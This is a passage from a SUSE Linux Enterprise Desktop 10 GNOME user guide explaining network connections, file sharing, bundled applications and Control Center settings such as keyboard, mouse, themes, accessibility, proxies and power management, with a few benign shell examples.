The Network Connections icon changes to a wireless signal strength bar, and any detected wireless networks are displayed in the Network Connections menu. If your network name is displayed, select the network name from the Network Connections menu. After you are connected, the Network Connections icon shows that you have a wireless connection.

If you do not see your wireless network name in the Network Connections menu:
1 Click the Network Connections icon on the main panel, then click Other.
2 In the Specify an ESSID dialog, type the wireless network name in the ESSID field.
3 (Conditional) If the wireless network is encrypted, click Show Encryption Key to display the Encryption Key field.
4 Type the encryption code, then click OK. Your wireless network's name should now appear in the Network Connections menu.
5 Select the wireless network's name.

Upon connection, the Network Connections icon turns blue. You can also confirm the connection by clicking the Network Connections icon and viewing Connection Information. If connected, your IP address and other details are displayed in the Connection Information dialog.

Managing Network Connections

The Network Connections icon lets you monitor, manage, and configure your network connections. Clicking the icon opens a window that displays which network connection is active, if you have more than one network device in your computer. For example, if your laptop computer is configured to use a wireless port and a port for a network cable, you will see two network connections in the list. If you are connected to the network via a cable and need to switch to wireless, simply click the Network Connections icon and then click Wireless: eth1. SLED switches your network connection and acquires a new IP address, if needed.

IMPORTANT: Prior to making the change, you should save any data, because the change in services might require that certain applications or services be restarted.

Using the menu, you can view connection information such as the IP address being used and your hardware address. If you need to update or make changes to your network settings, click Computer > Control Panel > Configure Network. This launches the Network Card Setup wizard, which steps you through the configuration process. Using this option requires you to provide the root password.

Accessing Network Shares

Other network devices, like workstations and servers, can be set up to share some or all of their resources. Typically, files and folders are marked to let remote users access them. These are called network shares. If your system is configured to access network shares, you can use Nautilus File Manager to access them.
To access network shares, click Computer > Nautilus, then click Network Servers. The window displays the network shares that you can access. Double-click the network resource that you want to access. You might be required to authenticate to the resource by providing a username and password.

To access NFS shares, double-click the UNIX Network icon. A list of UNIX shares available to you is displayed.
To access Windows shares, double-click the Windows Network icon. The Windows shares available to you are displayed.
Figure 1-7 Workgroups on a Windows Network
Adding a Network Place

1 Click Computer > Nautilus > File > Connect to Server.
2 Specify the name you want displayed for this link and its URL, then click Connect.

An icon for the network place is added to the desktop.

Sharing Directories from Your Computer

You can make directories on your computer available to other users on your network.

Enabling Sharing

Use YaST to enable sharing on your computer. In order to enable sharing, you must have root privileges and be a member of a workgroup or domain.
1 Click Computer > More Applications > System > YaST.
2 In YaST, click Network Services > Windows Domain Membership.
3 In the Windows Domain Membership module, click Allow Users To Share Their Directories.
4 Click Finish.

Sharing a Directory

If directory sharing is enabled on your computer, use the following steps to configure a directory to be shared.
1 Open Nautilus and browse to the directory you want to share.
2 Right-click the folder for the directory you want to share, then click Sharing Options.
3 Select the Share this folder check box, then type the name you want to use for this share.
4 If you want other users to be able to copy files to your shared directory, select the Allow other people to write in this folder check box.
5 (Optional) Type a comment.
6 Click Create Share.
1.5 Opening or Creating Documents with OpenOffice.org
For creating and editing documents, SLED includes OpenOffice.org, a complete set of office tools that can both read and save Microsoft Office file formats. OpenOffice.org has a word processor, a spreadsheet, a database, a drawing tool, and a presentation program. To get started, click Computer > OpenOffice.org Writer, or select an OpenOffice.org module by clicking Computer > More Applications > Office and then selecting the module you want to open. A number of sample documents and templates are included with OpenOffice.org. You can access the templates by clicking File > New > Templates and Documents. In addition, you can use AutoPilot, a feature which guides you through the creation of letters and other typical documents. For a more in-depth introduction to OpenOffice.org, see Chapter 3, “The OpenOffice.org Office Suite,” on page 65 or view the help in any OpenOffice.org program.
1.6 Exploring the Internet
SLED includes Firefox, a Mozilla* based Web browser. You can start it by clicking Computer > Firefox. You can type an address into the location bar at the top or click links in a page to move to different pages, just like in any other Web browser. For more information, see Chapter 9, “Browsing with Firefox,” on page 125.
1.7 E-mail and Calendaring
Novell Evolution seamlessly combines e-mail, a calendar, an address book, and a task list in one easy-to-use application. With its extensive support for communications and data interchange standards, Evolution can work with existing corporate networks and applications, including Microsoft Exchange. To start Evolution, click Computer > More Applications > Communicate > Evolution E-Mail or Computer > More Applications > Office > Evolution Calendar. For more information, see Chapter 4, “Evolution: E-Mail and Calendaring,” on page 85 and Chapter 5, “GroupWise Linux Client: E-Mailing and Calendaring,” on page 99.
1.8 Moving Text between Applications
To copy text between applications, select the text and then move the mouse cursor to the position where you want the text copied. Click the center button on the mouse or the scroll wheel to copy the text. When copying information between programs, you must keep the source program open and paste the text before closing it. When a program closes, any content from that application that is on the clipboard is lost.
1.9 Other Useful Programs
In addition to the programs already discussed, such as the applets you can add to a panel, SLED includes additional programs, organized in categories in the Application Browser. To access the programs, open the Application Browser by clicking Computer > More Applications, then browse through the categories to see which applications are available. Categories include the following:
Table 1-6 SLED Applications
Audio & Video: Music players, CD database, video editors, CD and DVD burners, volume controllers, and other audio and video applications
Browse: Applications for browsing the Internet and your computer’s file system
Communicate: E-mail, instant messaging, video conferencing, and other communication tools
Development: Web development, MONO documentation, sharing files between computers
Games: Card games, arcade favorites, and puzzles
Images: Image viewers and editors, drawing programs, photo browsers, scanning programs
Office: Word processors and text editors, spreadsheets, presentation software, database software, project management utilities, PDF reader, personal information managers, calendars
System: Search tools, system configuration tools, network tools, device managers
Tools: System customization, search configuration, calculators, and other tools
The following chapters in this guide describe some of the more commonly used applications.
1.10 Obtaining Software Updates
Through ZenWorks®, Novell offers important updates and enhancements that help protect your computer and ensure that it runs smoothly. The Software Update feature is designed to help you manage the software you have on your computer and to install, update, and remove programs without your having to track dependencies and resolve conflicts. Contact your system administrator for more information about how your company is disseminating updates.

To access the update tool, click Computer > More Applications > System > Update Software. If updates are available, the Zen Update icon appears in the notification area of the bottom panel. In this case, click the icon to access the update tool.
2 Customizing Your Settings
You can change the way SUSE® Linux Enterprise Desktop (SLED) looks and behaves to suit your own personal tastes and needs. Some of the settings you might want to change include:
• Desktop background
• Screen saver
• Keyboard and mouse configuration
• Sounds
• File associations

These settings and others can be changed in the Control Center. To access the Control Center, click Computer > Control Center. The Control Center is divided into the following four categories:
• Section 2.1, “Hardware,” on page 32
• Section 2.2, “Look and Feel,” on page 40
• Section 2.3, “Personal,” on page 47
• Section 2.4, “System,” on page 51
Figure 2-1 GNOME Control Center
2 ( bsj9luh.html) in the SUSE Linux Enterprise Desktop Deployment Guide.
2.1 Hardware
Hardware settings include the following:
• Section 2.1.1, “Configuring Bluetooth Services,” on page 32
• Section 2.1.2, “Configuring Your Graphics Card and Monitor,” on page 32
• Section 2.1.3, “Modifying Keyboard Preferences,” on page 32
• Section 2.1.4, “Configuring the Mouse,” on page 36
• Section 2.1.5, “Installing and Configuring Printers,” on page 38
• Section 2.1.6, “Configuring Removable Drives and Media,” on page 39
• Section 2.1.7, “Configuring a Scanner,” on page 39
• Section 2.1.8, “Specifying Screen Resolution Settings,” on page 40
2.1.1 Configuring Bluetooth Services
Bluetooth services enable you to connect wireless devices such as mobile phones and personal data assistants (PDAs) to your computer. Bluetooth wireless support includes automatic recognition of Bluetooth-enabled devices via the YaST central configuration and administration tool. Click Computer > Control Center > Hardware > Bluetooth, then set the configuration options that are appropriate for your device. NOTE: Root privileges are required for configuring Bluetooth services.
2.1.2 Configuring Your Graphics Card and Monitor
Your graphics card was configured for your monitor when you installed SLED. If you ever need to change these settings, click Computer > Control Center > Hardware > Graphics Card and Monitor, then set the appropriate options for your monitor. NOTE: Graphics card configuration is done in YaST2 and requires root privileges.
2.1.3 Modifying Keyboard Preferences
Use the Keyboard Preferences tool to modify the autorepeat preferences for your keyboard and to configure typing break settings. Click Computer > Control Center > Hardware > Keyboard. You can set the following preferences:
• Keyboard
• Typing Break
• Layouts
• Layout Options
SUSE Linux Enterprise Desktop 10 GNOME User Guide
Configuring Keyboard Preferences Use the Keyboard tabbed page to set general keyboard preferences.
Figure 2-2 Keyboard Preferences Dialog—Keyboard Page
You can modify any of the following keyboard preferences:
Table 2-1 Keyboard Preferences
Key Presses Repeat When Key is Held Down: Enables keyboard repeat. The action associated with a key is performed repeatedly when you press and hold that key. For example, if you press and hold a character key, the character is typed repeatedly. Use the Delay option to select the delay from the time you press a key to the time that the action repeats. Use the Speed option to set the speed at which the action is repeated.

Cursor Blinks in Text Boxes and Fields: Lets the cursor blink in fields and text boxes. Use the slider to specify the speed at which the cursor blinks.

Type to Test Settings: The test area is an interactive interface that lets you see how the keyboard settings affect the display as you type. Type text in the test area to test the effect of your settings.
Click the Accessibility button to start the Keyboard accessibility preference tool.
Configuring Typing Break Preferences Use the Typing Break tabbed page to set typing break preferences.
Figure 2-3 Keyboard Preferences Dialog—Typing Break Page
You can modify any of the following typing break preferences:
Table 2-2 Typing Break Preferences
Lock Screen to Enforce Typing Break: Locks the screen when you are due a typing break.

Work Interval Lasts: Lets you specify how long you can work before a typing break occurs.

Break Interval Lasts: Lets you specify the length of your typing breaks.

Allow Postponing of Breaks: Lets you postpone typing breaks.
Click the Accessibility button to start the Keyboard accessibility preference tool.
Configuring Keyboard Layout Preferences Use the Layouts tabbed page to set your keyboard layout.
Figure 2-4 Keyboard Preferences Dialog—Layouts Page
Select your keyboard model from the drop-down list, then use the Add and Remove buttons to add the selected layout to, or remove it from, the list of available layouts. You can select different layouts to suit different locales. Click the Accessibility button to start the Keyboard accessibility preference tool.

Configuring Keyboard Layout Options

Use the Layout Options tabbed page to set your keyboard layout options.
Figure 2-5 Keyboard Preferences Dialog—Layout Options Page
Select an option from the list of available layout options and click Add to add the option or Remove to remove it.
Click the Accessibility button to start the Keyboard accessibility preference tool.
2.1.4 Configuring the Mouse
Use the Mouse Preference tool to configure your mouse for right-hand or left-hand use. You can also specify the speed and sensitivity of mouse movement. Click Computer > Control Center > Hardware > Mouse. You can customize the settings for the Mouse Preference tool in the following areas:

• Buttons
• Cursors
• Motion

Configuring Button Preferences

Use the Buttons tabbed page to specify whether the mouse buttons are configured for left-hand use. You can also specify the delay between clicks for a double-click.
Figure 2-6 Mouse Preferences Dialog—Buttons Page
The following table lists the mouse button preferences you can modify.
Table 2-3 Mouse Button Preferences
Left-handed Mouse: Configures your mouse for left-hand use, swapping the functions of the left and right mouse buttons.

Timeout: Use the slider to specify the amount of time that can pass between clicks when you double-click. If the interval between the first and second clicks exceeds the time that is specified here, the action is not interpreted as a double-click.
Configuring Cursor Preferences Use the Cursors tabbed page to set your mouse pointer preferences.
Figure 2-7 Mouse Preferences Dialog—Cursors Page
The following table lists the mouse pointer preferences you can modify.
Table 2-4 Mouse Pointer Preferences
Cursor Theme: Displays the available cursor themes.

Highlight the Pointer When You Press Ctrl: Enables a mouse pointer animation when you press and release Ctrl. This feature can help you locate the mouse pointer.
Configuring Motion Preferences Use the Motion tabbed page to set your preferences for mouse movement.
Figure 2-8 Mouse Preferences Dialog—Motion Page
The following table lists the mouse motion preferences you can modify.
Table 2-5 Mouse Motion Preferences
Acceleration: Use the slider to specify the speed at which your mouse pointer moves on your screen when you move your mouse.

Sensitivity: Use the slider to specify how sensitive your mouse pointer is to movements of your mouse.

Threshold: Use the slider to specify the distance that you must move an item before the move action is interpreted as a drag-and-drop action.
2.1.5 Installing and Configuring Printers
Use the Printers module to install and configure printers.
To start the Printers module, click Computer > Control Center > Hardware > Printers.
Figure 2-9 Printers Dialog
For more information about setting up printing, see Chapter 8, “Managing Printers,” on page 121.
2.1.6 Configuring Removable Drives and Media
SLED supports a wide variety of removable drives and media, including storage devices, cameras, scanners, and more. The configurations for many of these devices are set up automatically when SLED is installed. To change the configuration for a drive or other removable device, click Computer > Control Center > Hardware > Removable Drives and Media. Some of the possible configuration settings include:

• What happens when a blank CD is inserted in the CD drive
• What happens when an audio CD is inserted in the drive
• Whether images are automatically imported from a digital camera when it is attached to the computer
• Whether removable storage devices are mounted when they are plugged in to the computer
• Whether PDAs are automatically synced when attached to the computer

In general, you do not need to change the settings that are already configured unless you want to change the behavior when a device is connected or you want to connect a new device that is not yet configured. If you attach a device for the first time and it behaves in an unexpected or undesired way, check the Removable Drives and Media settings.
2.1.7 Configuring a Scanner
The Scanner configuration enables you to attach and configure a scanner, or to remove an already-attached scanner.

NOTE: Scanner configuration is done in YaST2 and requires root privileges.

To open YaST2 and configure a scanner, click Computer > Control Center > Hardware > Scanner. Refer to the instructions on the Scanner Configuration screen for information about the available options.
2.1.8 Specifying Screen Resolution Settings
Use this module to specify the resolution settings for your screen, including Resolution and Refresh Rate. Click Computer > Control Center > Hardware > Screen Resolution.
Figure 2-10 Screen Resolution Preferences Dialog
The following table lists the screen resolution preferences you can modify.
Table 2-6 Screen Resolution Preferences
Resolution: Select the resolution (in pixels) to use for the screen.

Refresh Rate: Select the refresh rate to use for the screen.

Make Default for This Computer Only: Makes the screen resolution settings the default only for the computer that you are logged in to.
If you cannot find a setting you want, you might need to use the Administrator Settings to reconfigure your graphics card and monitor settings. See Configuring the Graphics Card and Monitor ( bsj9mwg.html#bsmqn45) in the SUSE Linux Enterprise Desktop Deployment Guide for more information.
2.2 Look and Feel
Look and Feel settings include the following:

• Section 2.2.1, “Changing the Desktop Background,” on page 41
• Section 2.2.2, “Configuring Fonts,” on page 42
• Section 2.2.3, “Configuring the Screen Saver,” on page 43
• Section 2.2.4, “Choosing a Theme,” on page 44
• Section 2.2.5, “Customizing Window Behavior,” on page 46
2.2.1 Changing the Desktop Background
The desktop background is the image or color that is applied to your desktop. You can customize the desktop background in the following ways:

• Select an image for the desktop background. The image is superimposed on the desktop background color. The desktop background color is visible if you select a transparent image or if the image does not cover the entire desktop.
• Select a color for the desktop background. You can select a solid color or create a gradient effect with two colors. A gradient effect is a visual effect where one color blends gradually into another color.

To change the desktop preferences:

1 Click Computer > Control Center > Look and Feel > Desktop Background.
2 Set the desktop preferences the way that you want them. The following settings can be changed:
Table 2-7 Background Preferences
Desktop Wallpaper: Displays an image of your choice on the desktop.

Style: Determines what processing steps should be applied to the selected image to adapt it optimally to the current screen resolution. To specify how to display the image, select one of the following options from the Style drop-down list:
• Centered: Displays the image in the middle of the desktop.
• Fill Screen: Enlarges the image to cover the desktop and maintains the relative dimensions of the image.
• Scaled: Enlarges the image until the image meets the screen edges and maintains the relative dimensions of the image.
• Tiled: Repeats the image over the entire screen.

Add Wallpaper: Opens a dialog where you can select an image file to use as the background picture.

Remove: Removes the selected Desktop Wallpaper from the list.

Desktop Colors: Lets you specify a color scheme using the options in the Desktop Colors drop-down list and the color selector buttons. You can specify a color scheme using any of the following options:
• Solid Color specifies a single color for the desktop background. To select a color, click Color. In the Pick a Color dialog, select a color, then click OK.
• Horizontal Gradient creates a gradient effect from the left screen edge to the right screen edge. Click Left Color to display the Pick a Color dialog, then select the color that you want to appear at the left edge. Click Right Color, then select the color that you want to appear at the right edge.
• Vertical Gradient creates a gradient effect from the top screen edge to the bottom screen edge. Click Top Color to display the Pick a Color dialog, then select the color that you want to appear at the top edge. Click Bottom Color, then select the color that you want to appear at the bottom edge.
3 When you are satisfied with your choices, click Close. Your desktop immediately changes to show the new settings.
2.2.2 Configuring Fonts
Use the Font Preferences dialog to select the fonts to use in your applications, windows, terminals, and desktop. To open the Font Preferences dialog, click Computer > Control Center > Look and Feel > Fonts.
Figure 2-11 Font Preferences Dialog
The upper part of the dialog shows the fonts selected for the application, desktop, window title, and terminal. Click one of the buttons to open a selection dialog where you can set the font family, style, and size.

To specify how to render fonts on your screen, select one of the following options:

• Monochrome: Renders fonts in black and white only, without antialiasing, so the edges of characters might appear jagged.
• Best Shapes: Antialiases fonts where possible. Use this option for standard Cathode Ray Tube (CRT) monitors.
• Best Contrast: Adjusts fonts to give the sharpest possible contrast and antialiases fonts so that characters have smooth edges. This option might enhance the accessibility of the GNOME Desktop to users with visual impairments.
• Subpixel Smoothing (LCDs): Uses techniques that exploit the shape of individual Liquid Crystal Display (LCD) pixels to render fonts smoothly. Use this option for LCD or flat-screen displays.

Click Details to specify further details of how to render fonts on your screen:

• Resolution (Dots Per Inch): Use the spin box to specify the resolution to use when your screen renders fonts.
• Smoothing: Select one of the options to specify how to antialias fonts.
• Hinting: Select one of the options to specify how to apply hinting, which improves the quality of fonts at small sizes and at low screen resolutions.
• Subpixel Order: Select one of the options to specify the subpixel color order for your fonts. Use this option for LCD or flat-screen displays.
2.2.3 Configuring the Screen Saver
A screen saver is a program that blanks the screen or displays graphics when the computer is not used for a specified amount of time. Originally, screen savers protected monitors from having images burned into them. Now they are used primarily for entertainment or security.
To configure a screen saver, click Computer > Control Center > Look and Feel > Screensaver.
Figure 2-12 Screensaver Preferences Dialog
You can select from Random (random selection of screen savers from a custom-defined list), Blank Screen, or a selection of installed screen savers. Select a screen saver from the list to choose it. The currently selected screen saver is displayed in the small preview window. Specify the amount of time that the screen is to be idle before the screen saver is activated, and whether the screen is locked when the screen saver is activated.
2.2.4 Choosing a Theme
A theme is a group of coordinated settings that specifies the visual appearance of a part of the desktop. You can choose themes to change the appearance of the desktop. Use the Theme Preferences tool to select from a list of preinstalled themes. The list of available themes includes several themes for users with accessibility requirements. To choose a theme, click Computer > Control Center > Look and Feel > Theme.

A theme contains settings that affect different parts of the desktop, as follows:

• Controls: The controls setting for a theme determines the visual appearance of windows, panels, and applets. It also determines the visual appearance of the GNOME-compliant interface items that appear on windows, panels, and applets, such as menus, icons, and buttons. Some of the controls setting options that are available are designed for special accessibility needs. You can select an option for the controls setting in the Controls tabbed page of the Theme Details tool.

• Window frame: The window frame setting for a theme determines the appearance of the frames around windows only. You can select an option for the window frame setting in the Window Border tabbed page of the Theme Details tool.
• Icon: The icon setting for a theme determines the appearance of the icons on panels and the desktop background. You can select an option for the icon setting in the Icons tabbed page of the Theme Details tool.

The color settings for the desktop and applications are controlled using themes. You can choose from a variety of preinstalled themes. Selecting a style from the list applies it automatically. Details opens another dialog where you can customize the style of single desktop elements, like window content, window borders, and icons. Making changes and leaving the dialog by clicking Close switches the theme to Custom Theme. Click Save Theme to save your modified theme under a custom name. The Internet and other sources provide many additional themes for GNOME as .tar.gz files. Install these with the Install Theme button.

Creating a Custom Theme

The themes that are listed in the Theme Preferences tool are different combinations of controls options, window frame options, and icon options. You can create a custom theme that uses different combinations of options.

1 Click Computer > Control Center > Look and Feel > Theme.
2 Select a theme from the list of themes, then click Theme Details.
3 Select the controls option that you want to use in the custom theme from the list in the Controls tabbed page.
4 Click the Window Border tab, then select the window frame option that you want to use in the custom theme.
5 Click the Icons tab, then select the icons option that you want to use in the custom theme.
6 Click Close > Save Theme. A Save Theme to Disk dialog is displayed.
7 Type a name and a short description for the custom theme in the dialog, then click Save. The custom theme now appears in your list of available themes.

Installing a New Theme

You can add a theme to the list of available themes. The new theme must be an archive file that is tarred and zipped (a .tar.gz file).

1 Click Computer > Control Center > Look and Feel > Theme.
2 Click Install Theme.
3 Specify the location of the theme archive file in the Location field, then click OK. You can also click Browse to browse for the file.
4 Click Install to install the new theme.

Installing a New Theme Option

You can install new controls options, window frame options, or icons options. You can find many controls options on the Internet.

1 Click Computer > Control Center > Look and Feel > Theme.
2 Click Theme Details, then click the tab for the type of theme you want to install. For example, to install an icons option, click the Icons tab.
3 Click Install Theme.
4 Specify the location of the theme archive file in the Location field, then click OK.
5 Click Install to install the new theme option.

Deleting a Theme Option

You can delete controls options, window frame options, or icons options.

1 Click Computer > Control Center > Look and Feel > Theme.
2 Click Theme Details, then click the tab for the type of option you want to delete.
3 Click Go To Theme Folder. A File Manager window opens on the default option folder.
4 Use the File Manager window to delete the option.
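Themes and theme options are distributed as tarred, gzipped (.tar.gz) archives. Before installing a downloaded archive through the Theme Preferences dialog, you can list its contents from a terminal to verify that it is intact. The following is only a sketch: the file and directory names are placeholders, and real theme archives have layouts that vary by theme type.

```shell
# Build a tiny stand-in archive so the example is self-contained
# (a real theme would instead be a downloaded .tar.gz file):
mkdir -p MyTheme/gtk-2.0
echo "# placeholder gtkrc" > MyTheme/gtk-2.0/gtkrc
tar -czf MyTheme.tar.gz MyTheme

# List the archive contents without unpacking, as you would do with a
# downloaded theme before clicking Install Theme:
tar -tzf MyTheme.tar.gz
```

If the listing fails or looks truncated, the download is probably corrupt and the Theme Preferences tool will not be able to install it either.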
2.2.5 Customizing Window Behavior
Use the Window Preferences tool to customize window behavior for the desktop. You can determine how a window reacts to contact with the mouse pointer or to double-clicks on its titlebar, and you can define which key to hold for moving an application window. To customize window behavior, click Computer > Control Center > Look and Feel > Windows.
Figure 2-13 Window Preferences Dialog
When several application windows populate the desktop, the active one by default is the one last clicked. Change this behavior by activating Select Windows When the Mouse Moves over Them. If desired, activate Raise Selected Window after an Interval and adjust the latency time with the slider. This raises a window a short time after it receives focus.

Application windows can be shaded (rolled up) by double-clicking the title bar, leaving only the title bar visible. This saves space on the desktop and is the default behavior. It is also possible to set windows to maximize when the title bar is double-clicked.
Using the radio buttons, select a modifier key to press for moving a window (Ctrl, Alt, Hyper, or the Windows logo key).
2.3 Personal
Personal settings include the following:

• Section 2.3.1, “Configuring Keyboard Accessibility Settings,” on page 47
• Section 2.3.2, “Configuring Assistive Technology Support,” on page 49
• Section 2.3.3, “Changing Your Password,” on page 50
• Section 2.3.4, “Configuring Language Settings,” on page 50
• Section 2.3.5, “Customizing Keyboard Shortcuts,” on page 51
2.3.1 Configuring Keyboard Accessibility Settings
GNOME provides keyboard settings designed to help users with motion impairments use the GNOME desktop. Some of the available settings include:

• How long a key is pressed and held before being recognized as valid input
• Whether the keyboard can be used as a mouse
• Whether key combinations that use Alt, Control, and Shift can be duplicated with “sticky keys”

To configure keyboard accessibility settings, click Computer > Control Center > Accessibility.
The module consists of three tabbed pages: Basic, Filters, and Mouse Keys. Before modifying settings, activate Enable Keyboard Accessibility Features.
Figure 2-14 Keyboard Accessibility Preferences Dialog
Features (Basic Tab)

The keyboard accessibility functions can be deactivated automatically after a certain time. Set an appropriate time limit (measured in seconds) with the slider. The system can additionally provide audible feedback when the keyboard accessibility functions are activated and deactivated.

Enable Sticky Keys (Basic Tab)

Some keyboard shortcuts require that one key (a modifier key such as Alt, Ctrl, or Shift) is kept pressed constantly while the rest of the shortcut is typed. When sticky keys are used, the system regards those keys as staying pressed after being pressed once. For audible feedback each time a modifier key is pressed, activate Beep when the modifier is pressed. If Disable If Two Keys Pressed Together is selected, the keys no longer “stick” when two keys are pressed simultaneously. The system then assumes that the keyboard shortcut has been completely entered.

Enable Repeat Keys (Basic Tab)

Activate Repeat Keys to make settings with sliders for Delay and Speed. This determines how long a key must be pressed for the automatic keyboard repeat function to be activated and at what speed the characters are then typed. Test the effect of the settings in the field at the bottom of the dialog. Select parameters that reflect your normal typing habits.
Enable Slow Keys (Filters Tab)

To prevent accidental typing, set a minimum time limit that a key must be pressed and held before it is recognized as valid input by the system. Also determine whether audible feedback should be provided for keypress events, accepted keypresses, and the rejection of a keypress.

Enable Bounce Keys (Filters Tab)

To prevent double typing, set a minimum time limit for accepting two subsequent keypress events of the same key as the input of two individual characters. If desired, activate audible feedback upon rejection of a keypress event.

Toggle Keys (Filters Tab)

You can request audible feedback from the system when a modifier key is pressed.

Mouse Keys Tab

Activates the keyboard mouse; the mouse pointer is controlled with the arrow keys of the number pad. Use the sliders to set the maximum speed of the mouse pointer, the acceleration time until the maximum speed is reached, and the latency between the pressing of a key and the cursor movement.
2.3.2 Configuring Assistive Technology Support
SLED includes assistive technologies for users with special needs. These technologies include:

• Screen reader
• Screen magnifier
• On-screen keyboard

To configure assistive technology options, click Computer > Control Center > Personal > Assistive Technology. To enable the technologies, first select Enable Assistive Technologies, then select the technologies you want to enable every time you log in.
Figure 2-15 Assistive Technology Preferences Dialog
The gok package must be installed for on-screen keyboard support, and the gnopernicus and gnome-mag packages must be installed for screen-reading and magnifying capabilities. These packages are installed by default in the SLED installation. If they are not installed on your system, install them with the following procedure:

1 Click System > Administrator Settings.
2 Type the root password, then click OK.
3 Click Software > Install and Remove Software.
4 Select Selection from the Filter drop-down menu, then select Accessibility from the Selection list.
5 Select gok, gnopernicus, and gnome-mag from the Package list.
6 Click Accept.
7 Insert SUSE Linux Enterprise Desktop 10 CD 2, then click OK.
8 Click Cancel > Close after the package installation is complete.
2.3.3 Changing Your Password
For security reasons, it is a good idea to change your password from time to time. To change your password:

1 Click Computer > Control Center > Personal > Change Password.
2 Type your old (current) password.
3 Type your new password.
4 Confirm your new password by typing it again, then click OK.
2.3.4 Configuring Language Settings
SLED can be configured to use any of many languages. The language setting determines the language of dialogs and menus, and can also determine the keyboard and clock layout. You can set the following language settings:

• Primary language
• Whether the keyboard language setting should depend on the primary language
• Whether the time zone should depend on the primary language
• Secondary languages

NOTE: You must have administrator (root) privileges to configure language settings.

To configure your language settings:

1 Click Computer > Control Center > Personal > Language.
2 (Conditional) If you are not logged in as root or a user with administrator privileges, enter the root password.
If you do not know the root password, contact your system administrator. You cannot continue without the root password.
3 Specify the primary language, whether you want to adapt the keyboard layout or time zone to the primary language, and any secondary languages you need to support on the computer.
4 Click Accept.

The language configuration settings are written to several configuration files. This process can take a few minutes. The new settings take effect immediately after they are written to the configuration files.
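Under the hood, the primary language chosen here is exposed to applications through locale environment variables such as LANG and LC_ALL. This is a general Linux mechanism rather than anything specific to the YaST module, but it shows what the setting controls: the same command renders its output according to the active locale. A minimal sketch, forcing the C (POSIX) locale so the output is in English:

```shell
# Print the weekday of a fixed date in the C locale; with a German
# locale active (for example LANG=de_DE.UTF-8, if installed) the same
# command would print the German weekday name instead.
LC_ALL=C date -d 2006-02-01 +%A
# prints: Wednesday
```

The `-d` option used here is specific to GNU date, which is what SLED ships.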
2.3.5 Customizing Keyboard Shortcuts
A keyboard shortcut is a key or combination of keys that provides an alternative to standard ways of performing an action. SLED allows you to customize the keyboard shortcuts for a number of actions. To open the Keyboard Shortcuts tool, click Computer > Control Center > Personal > Shortcuts.
Figure 2-16 Keyboard Shortcuts Dialog
To change the shortcut keys for an action, select the action and then press the keys you want to associate with the action. To disable the shortcut keys for an action, click the shortcut for the action, then press Backspace.
2.4 System
System settings include the following:

• Section 2.4.1, “Configuring Search with Beagle Settings,” on page 52
• Section 2.4.2, “Configuring Date and Time,” on page 52
• Section 2.4.3, “Configuring Network Proxies,” on page 52
• Section 2.4.4, “Configuring Power Management,” on page 53
• Section 2.4.5, “Setting Preferred Applications,” on page 54
• Section 2.4.6, “Setting Session Sharing Preferences,” on page 55
• Section 2.4.7, “Managing Sessions,” on page 56
• Section 2.4.8, “Setting Sound Preferences,” on page 59
• Section 2.4.9, “Managing Users and Groups,” on page 61
2.4.1 Configuring Search with Beagle Settings
Beagle is the search engine used on the SLED GNOME Desktop. By default, Beagle is configured to start automatically and index your home directory. To change these settings, to specify the number of results displayed after a search, or to change the Beagle privacy settings, click Computer > Control Center > System > Beagle Settings.
2.4.2 Configuring Date and Time
To change your date and time configuration, for example to change your time zone or the way the date and time are displayed, click Computer > Control Center > System > Date and Time. This opens the YaST Date and Time module, which requires root privileges. Enter the root password and follow the instructions on the YaST pages.
2.4.3 Configuring Network Proxies
The Network Proxy Configuration tool lets you configure how your system connects to the Internet. You can configure the desktop to connect to a proxy server and specify the details of the server. A proxy server is a server that intercepts requests to another server and fulfills the request itself, if it can. You can specify the Domain Name Service (DNS) name or the Internet Protocol (IP) address of the proxy server. A DNS name is a unique alphabetic identifier for a computer on a network. An IP address is a unique numeric identifier for a computer on a network. Click Computer > Control Center > System > Network Proxies.
Figure 2-17 Network Proxy Configuration Dialog
The following table lists the Internet connection options that you can modify.
Table 2-8 Internet Connection Options
Direct Internet connection: Connects directly to the Internet, without a proxy server.

Manual proxy configuration: Connects to the Internet through a proxy server and lets you configure the proxy server manually.

HTTP proxy: The DNS name or IP address of the proxy server to use when you request an HTTP service. Specify the port number of the HTTP service on the proxy server in the Port box.

Secure HTTP proxy: The DNS name or IP address of the proxy server to use when you request a Secure HTTP service. Specify the port number of the Secure HTTP service on the proxy server in the Port box.

FTP proxy: The DNS name or IP address of the proxy server to use when you request an FTP service. Specify the port number of the FTP service on the proxy server in the Port box.

Socks host: The DNS name or IP address of the Socks host to use. Specify the port number for the Socks protocol on the proxy server in the Port box.

Automatic proxy configuration: Connects to the Internet through a proxy server and lets you configure the proxy server automatically.

Autoconfiguration URL: The URL that contains the information required to configure the proxy server automatically.
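Note that many command-line tools do not read the GNOME proxy settings and instead honor proxy environment variables. A rough shell equivalent of a manual proxy configuration is sketched below; the host name and port are placeholders, not values from this guide.

```shell
# Point HTTP and FTP traffic of environment-aware tools (such as wget)
# at a proxy server; proxy.example.com and 3128 are placeholders:
export http_proxy="http://proxy.example.com:3128"
export ftp_proxy="http://proxy.example.com:3128"

# Confirm the variables are set:
echo "$http_proxy"
```

Settings exported this way apply only to the current shell session; to make them permanent, they would have to be placed in a shell startup file or a system-wide profile.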
2.4.4 Configuring Power Management
This module lets you manage your system’s power-saving options. It is especially useful for extending the life of a laptop’s battery charge. However, several options also help to save electricity when using a computer that is plugged in to an electricity source. Click Computer > Control Center > System > Power Management.

Specifying Sleep Mode Times

Sleep mode shuts down the computer when it is unused for a specified amount of time. Whether under battery or AC power, you can specify the amount of time that the computer remains unused before it is put to sleep. You can also put the computer’s display to sleep without shutting down the computer, saving the power required by the display.

Sleep mode is especially important when the computer is operating under battery power. Both the screen and the computer draw power from the battery, so you can save a significant amount of battery power by shutting down one or both. It is common to put the display to sleep after a shorter period of time (the default is five minutes). Then, if the computer remains unused for a further amount of time (default 20 minutes), it is also put to sleep.

To specify your computer’s sleep settings, open the Power Management module and click the Sleep tab. Then specify the amount of time that should pass before the display and computer are put to sleep, for both AC power and battery power.
Setting Power Options

To set the type of sleep mode used by your computer and the action to take when the battery power reaches the critical level, open the Power Management module and click the Options tab. There are two available types of sleep mode:

• Standby: Standby mode turns off power-consuming computer components such as the display and the hard drive without saving the contents of RAM. Any unsaved data is lost.
• Hibernate: Hibernate mode saves all contents of RAM to the hard disk before shutting off power to the system. When you start the system again, the saved data is put back into RAM, restoring your computer to the state it was in before it shut off. Hibernate requires an amount of free hard disk space equal to the amount of RAM installed on the computer.

Choose the type of sleep mode you prefer by selecting it from the menu. If you have sufficient free disk space, Hibernate is the better choice.

